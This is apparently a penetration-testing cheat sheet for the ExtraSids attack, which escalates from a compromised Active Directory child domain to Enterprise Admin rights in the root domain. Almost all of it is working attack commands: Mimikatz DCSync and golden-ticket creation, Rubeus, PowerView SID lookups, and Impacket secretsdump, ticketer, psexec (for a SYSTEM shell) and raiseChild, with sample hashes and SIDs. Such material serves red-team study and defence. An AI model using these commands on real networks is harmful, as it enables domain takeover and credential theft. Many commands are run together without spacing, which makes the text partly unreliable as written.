To perform this attack after compromising a child domain, we need the following:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.
# Obtaining the KRBTGT Account's NT Hash using Mimikatz, which also gives SIDPSC:\> mimikatz# lsadump::dcsync /user:LOGISTICS\\krbtgt# alternative to get SID using PowerViewGet-DomainSID# Obtaining Enterprise Admins Group's SID using Get-DomainGroup from PowerViewGet-DomainGroup-DomainDOMAIN.LOCAL-Identity"Enterprise Admins"|select distinguishedname,objectsid# Or using cmdlet Get-ADGroup-Identity"Enterprise Admins"-Server"DOMAIN.LOCAL".# Creating a Golden Ticket with Mimikatzmimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Checking if Golden ticket for non existant user hacker is residing in memoryklist
ExtraSids Attack - Rubeus
# Creating a Golden Ticket using Rubeus.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
Linux
# Performing DCSync with secretsdump.pysecretsdump.pychild.domain.local/adm@ip-just-dc-userchild/krbtgt# Performing SID Brute Forcing using lookupsid.py# to create their SID : DOMAIN_SID-RIDlookupsid.pychild.domain.local/adm@ip# Looking for the Domain SIDlookupsid.pychild.domain.local/adm@ip|grep-B12"Enterprise Admins"# Constructing a Golden Ticket using ticketer.pyticketer.py -nthash 9d7---5f -domain CHILD.DOMAIN.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
# Setting the KRB5CCNAME Environment Variableexport KRB5CCNAME=hacker.ccache# Getting a SYSTEM shell using Impacket's psexec.pypsexec.pyCHILD.DOMAIN.LOCAL/hacker@dc01.domain.local-k-no-pass-target-ipipOOORRR# Automating all of above # Performing the Attack with raiseChild.pyraiseChild.py-target-execipCHILD.DOMAIN.LOCAL/adm